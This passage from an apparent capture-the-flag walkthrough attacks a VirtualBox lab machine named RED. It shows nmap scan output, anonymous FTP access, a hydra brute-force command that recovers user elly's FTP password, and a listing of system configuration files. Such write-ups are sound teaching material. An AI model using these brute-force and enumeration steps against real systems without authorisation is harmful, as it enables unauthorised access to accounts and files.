<span style="background-color: white; font-family: Courier New, Courier, monospace; font-size: x-small;">SF:ight:2em;\x20line-height:2em;\x20border-bottom:\x201px\x20inset\x20blac</span><br />
<span style="background-color: white; font-family: Courier New, Courier, monospace; font-size: x-small;">SF:k;\x20margin:\x200;\x20}\nh1,\x20p\x20{\x20padding-left:\x2010px;\x20}\</span><br />
<span style="background-color: white; font-family: Courier New, Courier, monospace; font-size: x-small;">SF:ncode\.url\x20{\x20background-color:\x20#eeeeee;\x20font-family:monospa</span><br />
<span style="background-color: white; font-family: Courier New, Courier, monospace; font-size: x-small;">SF:ce;\x20padding:0\x202px;}\n</style>\n</head><body><h1>Not\x20Found</h1></span><br />
<span style="background-color: white; font-family: Courier New, Courier, monospace; font-size: x-small;">SF:<p>The\x20requested\x20resource\x20<code\x20class=\"url\">/</code>\x20w</span><br />
<span style="background-color: white; font-family: Courier New, Courier, monospace; font-size: x-small;">SF:as\x20not\x20found\x20on\x20this\x20server\.</p></body></html>")%r(Four</span><br />
<span style="background-color: white; font-family: Courier New, Courier, monospace; font-size: x-small;">SF:OhFourRequest,2A2,"HTTP/1\.0\x20404\x20Not\x20Found\r\nConnection:\x20c</span><br />
<span style="background-color: white; font-family: Courier New, Courier, monospace; font-size: x-small;">SF:lose\r\nContent-Type:\x20text/html;\x20charset=UTF-8\r\nContent-Length:</span><br />
<span style="background-color: white; font-family: Courier New, Courier, monospace; font-size: x-small;">SF:\x20568\r\n\r\n<!doctype\x20html><html><head><title>404\x20Not\x20Found</span><br />
<span style="background-color: white; font-family: Courier New, Courier, monospace; font-size: x-small;">SF:</title><style>\nbody\x20{\x20background-color:\x20#fcfcfc;\x20color:\x</span><br />
<span style="background-color: white; font-family: Courier New, Courier, monospace; font-size: x-small;">SF:20#333333;\x20margin:\x200;\x20padding:0;\x20}\nh1\x20{\x20font-size:\x</span><br />
<span style="background-color: white; font-family: Courier New, Courier, monospace; font-size: x-small;">SF:201\.5em;\x20font-weight:\x20normal;\x20background-color:\x20#9999cc;\x</span><br />
<span style="background-color: white; font-family: Courier New, Courier, monospace; font-size: x-small;">SF:20min-height:2em;\x20line-height:2em;\x20border-bottom:\x201px\x20inset</span><br />
<span style="background-color: white; font-family: Courier New, Courier, monospace; font-size: x-small;">SF:\x20black;\x20margin:\x200;\x20}\nh1,\x20p\x20{\x20padding-left:\x2010p</span><br />
<span style="background-color: white; font-family: Courier New, Courier, monospace; font-size: x-small;">SF:x;\x20}\ncode\.url\x20{\x20background-color:\x20#eeeeee;\x20font-family</span><br />
<span style="background-color: white; font-family: Courier New, Courier, monospace; font-size: x-small;">SF::monospace;\x20padding:0\x202px;}\n</style>\n</head><body><h1>Not\x20Fo</span><br />
<span style="background-color: white; font-family: Courier New, Courier, monospace; font-size: x-small;">SF:und</h1><p>The\x20requested\x20resource\x20<code\x20class=\"url\">/nice</span><br />
<span style="background-color: white; font-family: Courier New, Courier, monospace; font-size: x-small;">SF:%20ports%2C/Tri%6Eity\.txt%2ebak</code>\x20was\x20not\x20found\x20on\x2</span><br />
<span style="background-color: white; font-family: Courier New, Courier, monospace; font-size: x-small;">SF:0this\x20server\.</p></body></html>");</span><br />
<span style="background-color: white; font-family: Courier New, Courier, monospace; font-size: x-small;">==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============</span><br />
<span style="background-color: white; font-family: Courier New, Courier, monospace; font-size: x-small;">SF-Port666-TCP:V=7.01%I=7%D=6/9%Time=575983E3%P=i586-pc-linux-gnu%r(NULL,1</span><br />
<span style="background-color: white; font-family: Courier New, Courier, monospace; font-size: x-small;">SF:800,"PK\x03\x04\x14\0\x02\0\x08\0d\x80\xc3Hp\xdf\x15\x81\xaa,\0\0\x152\</span><br />
<span style="background-color: white; font-family: Courier New, Courier, monospace; font-size: x-small;">SF:0\0\x0c\0\x1c\0message2\.jpgUT\t\0\x03\+\x9cQWJ\x9cQWux\x0b\0\x01\x04\x</span><br />
<span style="background-color: white; font-family: Courier New, Courier, monospace; font-size: x-small;">SF:f5\x01\0\0\x04\x14\0\0\0\xadz\x0bT\x13\xe7\xbe\xefP\x94\x88\x88A@\xa2\x</span><br />
<span style="background-color: white; font-family: Courier New, Courier, monospace; font-size: x-small;">SF:20\x19\xabUT\xc4T\x11\xa9\x102>\x8a\xd4RDK\x15\x85Jj\xa9\"DL\[E\xa2\x0c</span><br />
<span style="background-color: white; font-family: Courier New, Courier, monospace; font-size: x-small;">SF:\x19\x140<\xc4\xb4\xb5\xca\xaen\x89\x8a\x8aV\x11\x91W\xc5H\x20\x0f\xb2\</span><br />
<span style="background-color: white; font-family: Courier New, Courier, monospace; font-size: x-small;">SF:xf7\xb6\x88\n\x82@%\x99d\xb7\xc8#;3\[\r_\xcddr\x87\xbd\xcf9\xf7\xaeu\xe</span><br />
<span style="background-color: white; font-family: Courier New, Courier, monospace; font-size: x-small;">SF:eY\xeb\xdc\xb3oX\xacY\xf92\xf3e\xfe\xdf\xff\xff\xff=2\x9f\xf3\x99\xd3\x</span><br />
<span style="background-color: white; font-family: Courier New, Courier, monospace; font-size: x-small;">SF:08y}\xb8a\xe3\x06\xc8\xc5\x05\x82>`\xfe\x20\xa7\x05:\xb4y\xaf\xf8\xa0\x</span><br />
<span style="background-color: white; font-family: Courier New, Courier, monospace; font-size: x-small;">SF:f8\xc0\^\xf1\x97sC\x97\xbd\x0b\xbd\xb7nc\xdc\xa4I\xd0\xc4\+j\xce\[\x87\</span><br />
<span style="background-color: white; font-family: Courier New, Courier, monospace; font-size: x-small;">SF:xa0\xe5\x1b\xf7\xcc=,\xce\x9a\xbb\xeb\xeb\xdds\xbf\xde\xbd\xeb\x8b\xf4\</span><br />
<span style="background-color: white; font-family: Courier New, Courier, monospace; font-size: x-small;">SF:xfdis\x0f\xeeM\?\xb0\xf4\x1f\xa3\xcceY\xfb\xbe\x98\x9b\xb6\xfb\xe0\xdc\</span><br />
<span style="background-color: white; font-family: Courier New, Courier, monospace; font-size: x-small;">SF:]sS\xc5bQ\xfa\xee\xb7\xe7\xbc\x05AoA\x93\xfe9\xd3\x82\x7f\xcc\xe4\xd5\x</span><br />
<span style="background-color: white; font-family: Courier New, Courier, monospace; font-size: x-small;">SF:1dx\xa2O\x0e\xdd\x994\x9c\xe7\xfe\x871\xb0N\xea\x1c\x80\xd63w\xf1\xaf\x</span><br />
<span style="background-color: white; font-family: Courier New, Courier, monospace; font-size: x-small;">SF:bd&&q\xf9\x97'i\x85fL\x81\xe2\\\xf6\xb9\xba\xcc\x80\xde\x9a\xe1\xe2:\xc</span><br />
<span style="background-color: white; font-family: Courier New, Courier, monospace; font-size: x-small;">SF:3\xc5\xa9\x85`\x08r\x99\xfc\xcf\x13\xa0\x7f{\xb9\xbc\xe5:i\xb2\x1bk\x8a</span><br />
<span style="background-color: white; font-family: Courier New, Courier, monospace; font-size: x-small;">SF:\xfbT\x0f\xe6\x84\x06/\xe8-\x17W\xd7\xb7&\xb9N\x9e<\xb1\\\.\xb9\xcc\xe7</span><br />
<span style="background-color: white; font-family: Courier New, Courier, monospace; font-size: x-small;">SF:\xd0\xa4\x19\x93\xbd\xdf\^\xbe\xd6\xcdg\xcb\.\xd6\xbc\xaf\|W\x1c\xfd\xf</span><br />
<span style="background-color: white; font-family: Courier New, Courier, monospace; font-size: x-small;">SF:6\xe2\x94\xf9\xebj\xdbf~\xfc\x98x'\xf4\xf3\xaf\x8f\xb9O\xf5\xe3\xcc\x9a</span><br />
<span style="background-color: white; font-family: Courier New, Courier, monospace; font-size: x-small;">SF:\xed\xbf`a\xd0\xa2\xc5KV\x86\xad\n\x7fou\xc4\xfa\xf7\xa37\xc4\|\xb0\xf1</span><br />
<span style="background-color: white; font-family: Courier New, Courier, monospace; font-size: x-small;">SF:\xc3\x84O\xb6nK\xdc\xbe#\)\xf5\x8b\xdd{\xd2\xf6\xa6g\x1c8\x98u\(\[r\xf8</span><br />
<span style="background-color: white; font-family: Courier New, Courier, monospace; font-size: x-small;">SF:H~A\xe1qYQq\xc9w\xa7\xbe\?}\xa6\xfc\x0f\?\x9c\xbdTy\xf9\xca\xd5\xaak\xd</span><br />
<span style="background-color: white; font-family: Courier New, Courier, monospace; font-size: x-small;">SF:7\x7f\xbcSW\xdf\xd0\xd8\xf4\xd3\xddf\xb5F\xabk\xd7\xff\xe9\xcf\x7fy\xd2</span><br />
<span style="background-color: white; font-family: Courier New, Courier, monospace; font-size: x-small;">SF:\xd5\xfd\xb4\xa7\xf7Y_\?n2\xff\xf5\xd7\xdf\x86\^\x0c\x8f\x90\x7f\x7f\xf</span><br />
<span style="background-color: white; font-family: Courier New, Courier, monospace; font-size: x-small;">SF:9\xea\xb5m\x1c\xfc\xfef\"\.\x17\xc8\xf5\?B\xff\xbf\xc6\xc5,\x82\xcb\[\x</span><br />
<span style="background-color: white; font-family: Courier New, Courier, monospace; font-size: x-small;">SF:93&\xb9NbM\xc4\xe5\xf2V\xf6\xc4\t3&M~{\xb9\x9b\xf7\xda-\xac\]_\xf9\xcc\</span><br />
<span style="background-color: white; font-family: Courier New, Courier, monospace; font-size: x-small;">SF:[qt\x8a\xef\xbao/\xd6\xb6\xb9\xcf\x0f\xfd\x98\x98\xf9\xf9\xd7\x8f\xa7\x</span><br />
<span style="background-color: white; font-family: Courier New, Courier, monospace; font-size: x-small;">SF:fa\xbd\xb3\x12_@N\x84\xf6\x8f\xc8\xfe{\x81\x1d\xfb\x1fE\xf6\x1f\x81\xfd</span><br />
<span style="background-color: white; font-family: Courier New, Courier, monospace; font-size: x-small;">SF:\xef\xb8\xfa\xa1i\xae\.L\xf2\\g@\x08D\xbb\xbfp\xb5\xd4\xf4Ym\x0bI\x96\x</span><br />
<span style="background-color: white; font-family: Courier New, Courier, monospace; font-size: x-small;">SF:1e\xcb\x879-a\)T\x02\xc8\$\x14k\x08\xae\xfcZ\x90\xe6E\xcb<C\xcap\x8f\xd</span><br />
<span style="background-color: white; font-family: Courier New, Courier, monospace; font-size: x-small;">SF:0\x8f\x9fu\x01\x8dvT\xf0'\x9b\xe4ST%\x9f5\x95\xab\rSWb\xecN\xfb&\xf4\xe</span><br />
<span style="background-color: white; font-family: Courier New, Courier, monospace; font-size: x-small;">SF:d\xe3v\x13O\xb73A#\xf0,\xd5\xc2\^\xe8\xfc\xc0\xa7\xaf\xab4\xcfC\xcd\x88</span><br />
<span style="background-color: white; font-family: Courier New, Courier, monospace; font-size: x-small;">SF:\x8e}\xac\x15\xf6~\xc4R\x8e`wT\x96\xa8KT\x1cam\xdb\x99f\xfb\n\xbc\xbcL}</span><br />
<span style="background-color: white; font-family: Courier New, Courier, monospace; font-size: x-small;">SF:AJ\xe5H\x912\x88\(O\0k\xc9\xa9\x1a\x93\xb8\x84\x8fdN\xbf\x17\xf5\xf0\.n</span><br />
<span style="background-color: white; font-family: Courier New, Courier, monospace; font-size: x-small;">SF:py\.9\x04\xcf\x14\x1d\x89Rr9\xe4\xd2\xae\x91#\xfbOg\xed\xf6\x15\x04\xf6</span><br />
<span style="background-color: white; font-family: Courier New, Courier, monospace; font-size: x-small;">SF:~\xf1\]V\xdcBGu\xeb\xaa=\x8e\xef\xa4HU\x1e\x8f\x9f\x9bI\xf4\xb6GTQ\xf3\</span><br />
<span style="background-color: white; font-family: Courier New, Courier, monospace; font-size: x-small;">SF:xe9\xe5\x8e\x0b\x14L\xb2\xda\x92\x12\xf3\x95\xa2\x1c\xb3\x13\*P\x11\?\x</span><br />
<span style="background-color: white; font-family: Courier New, Courier, monospace; font-size: x-small;">SF:fb\xf3\xda\xcaDfv\x89`\xa9\xe4k\xc4S\x0e\xd6P0");</span><br />
<span style="background-color: white; font-family: Courier New, Courier, monospace; font-size: x-small;">MAC Address: 08:00:27:DB:34:50 (Oracle VirtualBox virtual NIC)</span><br />
<span style="background-color: white; font-family: Courier New, Courier, monospace; font-size: x-small;">Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel</span><br />
<span style="background-color: white; font-family: Courier New, Courier, monospace; font-size: x-small;"><br /></span>
<span style="background-color: white; font-family: Courier New, Courier, monospace; font-size: x-small;">Host script results:</span><br />
<span style="background-color: white; font-family: Courier New, Courier, monospace; font-size: x-small;">| nbstat: NetBIOS name: RED, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)</span><br />
<span style="background-color: white; font-family: Courier New, Courier, monospace; font-size: x-small;">| Names:</span><br />
<span style="background-color: white; font-family: Courier New, Courier, monospace; font-size: x-small;">| RED<00> Flags: <unique><active></span><br />
<span style="background-color: white; font-family: Courier New, Courier, monospace; font-size: x-small;">| RED<03> Flags: <unique><active></span><br />
<span style="background-color: white; font-family: Courier New, Courier, monospace; font-size: x-small;">| RED<20> Flags: <unique><active></span><br />
<span style="background-color: white; font-family: Courier New, Courier, monospace; font-size: x-small;">| \x01\x02__MSBROWSE__\x02<01> Flags: <group><active></span><br />
<span style="background-color: white; font-family: Courier New, Courier, monospace; font-size: x-small;">| WORKGROUP<00> Flags: <group><active></span><br />
<span style="background-color: white; font-family: Courier New, Courier, monospace; font-size: x-small;">| WORKGROUP<1d> Flags: <unique><active></span><br />
<span style="background-color: white; font-family: Courier New, Courier, monospace; font-size: x-small;">| WORKGROUP<1e> Flags: <group><active></span><br />
<span style="background-color: white; font-family: Courier New, Courier, monospace; font-size: x-small;">| Statistics:</span><br />
<span style="background-color: white; font-family: Courier New, Courier, monospace; font-size: x-small;">| 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00</span><br />
<span style="background-color: white; font-family: Courier New, Courier, monospace; font-size: x-small;">| 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00</span><br />
<span style="background-color: white; font-family: Courier New, Courier, monospace; font-size: x-small;">|_ 00 00 00 00 00 00 00 00 00 00 00 00 00 00</span><br />
<span style="background-color: white; font-family: Courier New, Courier, monospace; font-size: x-small;">| p2p-conficker: </span><br />
<span style="background-color: white; font-family: Courier New, Courier, monospace; font-size: x-small;">| Checking for Conficker.C or higher...</span><br />
<span style="background-color: white; font-family: Courier New, Courier, monospace; font-size: x-small;">| Check 1 (port 63911/tcp): CLEAN (Timeout)</span><br />
<span style="background-color: white; font-family: Courier New, Courier, monospace; font-size: x-small;">| Check 2 (port 10987/tcp): CLEAN (Timeout)</span><br />
<span style="background-color: white; font-family: Courier New, Courier, monospace; font-size: x-small;">| Check 3 (port 22323/udp): CLEAN (Failed to receive data)</span><br />
<span style="background-color: white; font-family: Courier New, Courier, monospace; font-size: x-small;">| Check 4 (port 42548/udp): CLEAN (Failed to receive data)</span><br />
<span style="background-color: white; font-family: Courier New, Courier, monospace; font-size: x-small;">|_ 0/4 checks are positive: Host is CLEAN or ports are blocked</span><br />
<span style="background-color: white; font-family: Courier New, Courier, monospace; font-size: x-small;">| smb-os-discovery: </span><br />
<span style="background-color: white; font-family: Courier New, Courier, monospace; font-size: x-small;">| OS: Windows 6.1 (Samba 4.3.9-Ubuntu)</span><br />
<span style="background-color: white; font-family: Courier New, Courier, monospace; font-size: x-small;">| Computer name: red</span><br />
<span style="background-color: white; font-family: Courier New, Courier, monospace; font-size: x-small;">| NetBIOS computer name: RED</span><br />
<span style="background-color: white; font-family: Courier New, Courier, monospace; font-size: x-small;">| Domain name: </span><br />
<span style="background-color: white; font-family: Courier New, Courier, monospace; font-size: x-small;">| FQDN: red</span><br />
<span style="background-color: white; font-family: Courier New, Courier, monospace; font-size: x-small;">|_ System time: 2016-06-09T21:27:58+01:00</span><br />
<span style="background-color: white; font-family: Courier New, Courier, monospace; font-size: x-small;">| smb-security-mode: </span><br />
<span style="background-color: white; font-family: Courier New, Courier, monospace; font-size: x-small;">| account_used: guest</span><br />
<span style="background-color: white; font-family: Courier New, Courier, monospace; font-size: x-small;">| authentication_level: user</span><br />
<span style="background-color: white; font-family: Courier New, Courier, monospace; font-size: x-small;">| challenge_response: supported</span><br />
<span style="background-color: white; font-family: Courier New, Courier, monospace; font-size: x-small;">|_ message_signing: disabled (dangerous, but default)</span><br />
<span style="background-color: white; font-family: Courier New, Courier, monospace; font-size: x-small;">|_smbv2-enabled: Server supports SMBv2 protocol</span><br />
<span style="background-color: white; font-family: Courier New, Courier, monospace; font-size: x-small;"><br /></span>
<span style="background-color: white; font-family: Courier New, Courier, monospace; font-size: x-small;">NSE: Script Post-scanning.</span><br />
<span style="background-color: white; font-family: Courier New, Courier, monospace; font-size: x-small;">NSE: Starting runlevel 1 (of 2) scan.</span><br />
<span style="background-color: white; font-family: Courier New, Courier, monospace; font-size: x-small;">Initiating NSE at 10:58</span><br />
<span style="background-color: white; font-family: Courier New, Courier, monospace; font-size: x-small;">Completed NSE at 10:58, 0.00s elapsed</span><br />
<span style="background-color: white; font-family: Courier New, Courier, monospace; font-size: x-small;">NSE: Starting runlevel 2 (of 2) scan.</span><br />
<span style="background-color: white; font-family: Courier New, Courier, monospace; font-size: x-small;">Initiating NSE at 10:58</span><br />
<span style="background-color: white; font-family: Courier New, Courier, monospace; font-size: x-small;">Completed NSE at 10:58, 0.00s elapsed</span><br />
<span style="background-color: white; font-family: Courier New, Courier, monospace; font-size: x-small;">Read data files from: /usr/bin/../share/nmap</span><br />
<span style="background-color: white; font-family: Courier New, Courier, monospace; font-size: x-small;">Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .</span><br />
<span style="background-color: white; font-family: Courier New, Courier, monospace; font-size: x-small;">Nmap done: 1 IP address (1 host up) scanned in 171.27 seconds</span><br />
<span style="background-color: white; font-family: Courier New, Courier, monospace; font-size: x-small;"> Raw packets sent: 131149 (5.771MB) | Rcvd: 157102 (17.070MB)</span><br />
<span style="background-color: white; font-family: Courier New, Courier, monospace; font-size: x-small;">root@kali:~# </span><br />
<br />
First thing I noticed is anonymous FTP. Let's connect and check what's there.<br />
<br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">root@kali:~# ftp 192.168.1.3</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">Connected to 192.168.1.3.</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">220-</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">220-|-----------------------------------------------------------------------------------------|</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">220-| Harry, make sure to update the banner when you get a chance to show who has access here |</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">220-|-----------------------------------------------------------------------------------------|</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">220-</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">220 </span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">Name (192.168.1.3:root): anonymous</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">331 Please specify the password.</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">Password:</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">230 Login successful.</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">Remote system type is UNIX.</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">Using binary mode to transfer files.</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">ftp> ls</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">200 PORT command successful. Consider using PASV.</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">150 Here comes the directory listing.</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">-rw-r--r-- 1 0 0 107 Jun 03 23:06 note</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">226 Directory send OK.</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">ftp></span><br />
<br />
There is a file 'note'. The content of this file looks like this:<br />
<br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">root@kali:~# cat note </span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">Elly, make sure you update the payload information. Leave it in your FTP account once your are done, John.</span><br />
<br />
From this, looks like user 'elly' has FTP access. I ran hydra with '-e nsr' option on FTP server.<br />
<br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">root@kali:~# hydra -l elly -e nsr ftp://192.168.1.3</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">Hydra v8.1 (c) 2014 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><br /></span>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">Hydra (http://www.thc.org/thc-hydra) starting at 2016-06-09 14:12:59</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">[DATA] max 3 tasks per 1 server, overall 64 tasks, 3 login tries (l:1/p:3), ~0 tries per task</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">[DATA] attacking service ftp on port 21</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">[21][ftp] host: 192.168.1.3 login: elly password: ylle</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">1 of 1 target successfully completed, 1 valid password found</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">Hydra (http://www.thc.org/thc-hydra) finished at 2016-06-09 14:13:12</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">root@kali:~# </span><br />
<br />
Great !! Now we have password for this user. Let's log in into FTP.<br />
<br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">root@kali:~/Documents# ftp 192.168.1.3</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">Connected to 192.168.1.3.</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">220-</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">220-|-----------------------------------------------------------------------------------------|</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">220-| Harry, make sure to update the banner when you get a chance to show who has access here |</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">220-|-----------------------------------------------------------------------------------------|</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">220-</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">220 </span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">Name (192.168.1.3:root): elly</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">331 Please specify the password.</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">Password:</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">230 Login successful.</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">Remote system type is UNIX.</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">Using binary mode to transfer files.</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">ftp> ls -la</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">200 PORT command successful. Consider using PASV.</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">150 Here comes the directory listing.</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">drwxr-xr-x 100 0 0 12288 Jun 09 21:08 .</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">drwxr-xr-x 100 0 0 12288 Jun 09 21:08 ..</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">-rw------- 1 0 0 0 Apr 20 23:09 .pwd.lock</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">drwxr-xr-x 5 0 0 4096 Jun 03 13:51 X11</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">drwxr-xr-x 3 0 0 4096 Jun 03 13:51 acpi</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">-rw-r--r-- 1 0 0 3028 Apr 20 23:09 adduser.conf</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">-rw-r--r-- 1 0 0 51 Jun 03 19:20 aliases</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">-rw-r--r-- 1 0 0 12288 Jun 03 19:20 aliases.db</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">drwxr-xr-x 2 0 0 4096 Jun 07 01:57 alternatives</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">drwxr-xr-x 8 0 0 4096 Jun 03 17:46 apache2</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">drwxr-xr-x 3 0 0 4096 Jun 03 13:51 apparmor</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">drwxr-xr-x 9 0 0 4096 Jun 06 23:17 apparmor.d</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">drwxr-xr-x 3 0 0 4096 Jun 03 13:51 apport</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">drwxr-xr-x 6 0 0 4096 Jun 03 14:05 apt</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">-rw-r----- 1 0 1 144 Jan 14 23:35 at.deny</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">drwxr-xr-x 5 0 0 4096 Jun 03 14:47 authbind</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">-rw-r--r-- 1 0 0 2188 Sep 01 2015 bash.bashrc</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">drwxr-xr-x 2 0 0 4096 Jun 03 13:52 bash_completion.d</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">-rw-r--r-- 1 0 0 367 Jan 27 15:17 bindresvport.blacklist</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">drwxr-xr-x 2 0 0 4096 Apr 12 11:30 binfmt.d</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">drwxr-xr-x 2 0 0 4096 Jun 03 13:51 byobu</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">drwxr-xr-x 3 0 0 4096 Jun 03 13:51 ca-certificates</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">-rw-r--r-- 1 0 0 7788 Jun 03 13:51 ca-certificates.conf</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">drwxr-xr-x 2 0 0 4096 Jun 03 13:49 console-setup</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">drwxr-xr-x 2 0 0 4096 Jun 03 19:13 cron.d</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">drwxr-xr-x 2 0 0 4096 Jun 03 17:07 cron.daily</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">drwxr-xr-x 2 0 0 4096 Jun 03 13:49 cron.hourly</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">drwxr-xr-x 2 0 0 4096 Jun 03 13:49 cron.monthly</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">drwxr-xr-x 2 0 0 4096 Jun 03 13:51 cron.weekly</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">-rw-r--r-- 1 0 0 722 Apr 05 22:59 crontab</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">-rw-r--r-- 1 0 0 54 Jun 03 13:51 crypttab</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">drwxr-xr-x 2 0 0 4096 Jun 04 00:02 dbconfig-common</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">drwxr-xr-x 4 0 0 4096 Jun 03 13:51 dbus-1</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">-rw-r--r-- 1 0 0 2969 Nov 10 2015 debconf.conf</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">-rw-r--r-- 1 0 0 12 Apr 30 2015 debian_version</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">drwxr-xr-x 3 0 0 4096 Jun 05 23:04 default</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">-rw-r--r-- 1 0 0 604 Jul 02 2015 deluser.conf</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">drwxr-xr-x 2 0 0 4096 Jun 03 13:49 depmod.d</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">drwxr-xr-x 4 0 0 4096 Jun 03 13:49 dhcp</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">-rw-r--r-- 1 0 0 26716 Jul 30 2015 dnsmasq.conf</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">drwxr-xr-x 2 0 0 4096 Jun 03 14:19 dnsmasq.d</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">drwxr-xr-x 4 0 0 4096 Jun 07 01:57 dpkg</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">-rw-r--r-- 1 0 0 96 Apr 20 23:09 environment</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">drwxr-xr-x 4 0 0 4096 Jun 03 14:18 fonts</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">-rw-r--r-- 1 0 0 594 Jun 03 13:49 fstab</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">-rw-r--r-- 1 0 0 132 Feb 11 00:47 ftpusers</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">-rw-r--r-- 1 0 0 280 Jun 20 2014 fuse.conf</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">-rw-r--r-- 1 0 0 2584 Feb 18 18:54 gai.conf</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">-rw-rw-r-- 1 0 0 1253 Jun 04 20:13 group</span><br />
